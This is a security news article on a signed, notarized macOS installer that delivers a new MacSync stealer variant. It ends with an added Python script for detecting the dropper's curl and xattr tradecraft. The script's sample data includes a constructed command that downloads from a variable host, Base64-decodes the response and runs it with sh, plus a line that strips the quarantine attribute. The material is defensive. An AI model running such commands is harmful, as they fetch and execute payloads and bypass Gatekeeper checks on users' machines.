- MacSync has a new variant delivered inside a code-signed, notarized Swift app in a DMG file hosted on zkcall[.]net/download.
- The installer relied on a valid code signature and Apple notarization, so Gatekeeper let it run without the usual warning, and on user prompts to complete installation; Apple has since revoked the signing certificate.
- The Swift dropper enforces checks (connectivity, a ~3600‑second delay, quarantine removal) and fetches a Base64 payload decoded into the MacSync stealer.
- Attackers used evasion tactics such as unusual curl flags, dynamic variables, and an inflated 25.5 MB DMG containing unrelated PDFs.
On Dec. 24, 2025, researchers at Jamf reported a new macOS information stealer variant delivered as a digitally signed, notarized Swift application inside a disk image named “zk-call-messenger-installer-3.9.2-lts.dmg” hosted at zkcall[.]net/download. The malware was packaged to look like a messaging-app installer so that it would pass Apple's checks without raising warnings; Apple has since revoked the code‑signing certificate. According to Jamf researcher Thijs Xhaflaire, this sample uses a more deceptive, hands‑off method than prior MacSync variants.
The Swift dropper performs multiple runtime checks before executing the payload. It verifies internet connectivity, enforces a minimum interval of roughly 3600 seconds between executions, removes quarantine attributes (so Gatekeeper will not re-evaluate the files it writes), and validates files prior to launch. The dropper then retrieves an encoded script via a helper component and decodes a Base64 payload that corresponds to MacSync.
“Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants,” wrote the researcher, noting the use of split flags (-fL and -sS) and additional options like --noproxy (source). Together with dynamically populated variables in the command, these changes point to altered fetching and validation behavior, and they give defenders a concrete pattern to hunt for in process telemetry.
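The tradecraft described above (split short curl flags, --noproxy, a URL assembled from shell variables, the output fed into a Base64 decoder, and quarantine attributes being stripped) is the kind of thing that is easy to hunt for once it is written down as rules. The following is an added example, not code from Jamf or from the article, that scores command lines against those heuristics. The sample command lines are constructed for illustration and are not the exact commands the dropper used; field names and thresholds are likewise assumptions.

```python
import os
import shlex

# Constructed sample process command lines (illustration only, not the
# commands from the Jamf report). In practice these would come from
# EDR process events, unified log data, or a shell history file.
SAMPLE_COMMAND_LINES = [
    # 1: the pattern the article describes: split flags, --noproxy, a shell
    #    variable in the URL, and the response piped into a Base64 decoder.
    'curl -fL -sS --noproxy "*" "$ENDPOINT/$PATH" | base64 -D > /tmp/.s && sh /tmp/.s',
    # 2: an ordinary one-off download a developer might type.
    'curl -fsSL https://example.org/installer.pkg -o installer.pkg',
    # 3: quarantine attribute stripped from a mounted app bundle.
    'xattr -d com.apple.quarantine /Volumes/Installer/Messenger.app',
    # 4: unrelated command that should not be flagged.
    'ls -la /Applications',
]

# Tokens that separate one command from the next inside a single line.
_SEPARATORS = {"|", "&&", "||", ";"}
_DECODE_FLAGS = {"-d", "-D", "--decode"}


def split_pipeline(cmdline):
    """Tokenise a shell line and split it into per-program argv lists."""
    try:
        tokens = shlex.split(cmdline, posix=True)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        tokens = cmdline.split()
    segments, current = [], []
    for tok in tokens:
        if tok in _SEPARATORS:
            if current:
                segments.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        segments.append(current)
    return segments


def curl_findings(argv, following):
    """Heuristics for a curl invocation; `following` is the rest of the pipeline."""
    reasons = []
    if "-fL" in argv and "-sS" in argv:
        reasons.append("curl: split short flags -fL and -sS")
    if any(tok == "--noproxy" or tok.startswith("--noproxy=") for tok in argv):
        reasons.append("curl: --noproxy present")
    if any("$" in tok for tok in argv[1:] if not tok.startswith("-")):
        reasons.append("curl: URL or argument built from a shell variable")
    if following:
        nxt = following[0]
        if os.path.basename(nxt[0]) == "base64" and _DECODE_FLAGS & set(nxt[1:]):
            reasons.append("curl: output piped into a Base64 decoder")
    return reasons


def xattr_findings(argv):
    """Flag removal of the quarantine attribute (Gatekeeper will not re-check)."""
    if "-c" in argv or ("-d" in argv and "com.apple.quarantine" in argv):
        return ["xattr: quarantine attribute removed"]
    return []


def analyze_command(cmdline):
    """Return the list of heuristic hits for one command line (empty = clean)."""
    reasons = []
    segments = split_pipeline(cmdline)
    for i, argv in enumerate(segments):
        prog = os.path.basename(argv[0])
        if prog == "curl":
            reasons.extend(curl_findings(argv, segments[i + 1:]))
        elif prog == "xattr":
            reasons.extend(xattr_findings(argv))
    return reasons


def scan(lines, min_hits=1):
    """Return (line, reasons) for every line with at least `min_hits` hits."""
    flagged = []
    for line in lines:
        reasons = analyze_command(line)
        if len(reasons) >= min_hits:
            flagged.append((line, reasons))
    return flagged


if __name__ == "__main__":
    for line, reasons in scan(SAMPLE_COMMAND_LINES):
        print(line)
        for r in reasons:
            print("   -", r)
```

A single hit (a developer who types `-fL -sS` out of habit, say) is weak evidence on its own; the value is in the combination of several deviations on one line, which is why `scan` takes a `min_hits` threshold. Note that shlex drops the quotes but keeps the `$VAR` text, so the variable heuristic works on the command as logged, not on what the shell expanded it to.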
The decoded payload links MacSync to a rebranded form of Mac.c, and researchers at Moonlock Lab note that MacSync includes a Go‑based agent enabling remote command‑and‑control capabilities. Attackers also inflated the DMG to about 25.5 MB by embedding unrelated PDF files as an evasion tactic.
Definitions:
- Gatekeeper — Apple's app verification feature that checks a downloaded app's code signature and notarization before allowing it to run; the check is triggered by the quarantine attribute that browsers and other downloaders set on files.
- Notarized — a process where a developer submits an app to Apple, Apple scans it for known malware, and issues a notarization ticket that Gatekeeper accepts.
- DMG — a macOS disk image file used to distribute software.
- Base64 — an encoding method that converts binary data to ASCII text for transport.
Similar tactics have been observed elsewhere: code‑signed DMGs mimicking Google Meet have carried other stealers such as Odyssey, while some campaigns still use unsigned images to deliver malware like DigitStealer. “This shift in distribution reflects a broader trend across the macOS malware landscape, where attackers increasingly attempt to sneak their malware into executables that are signed and notarized, allowing them to look more like legitimate applications,” the researchers stated (source).
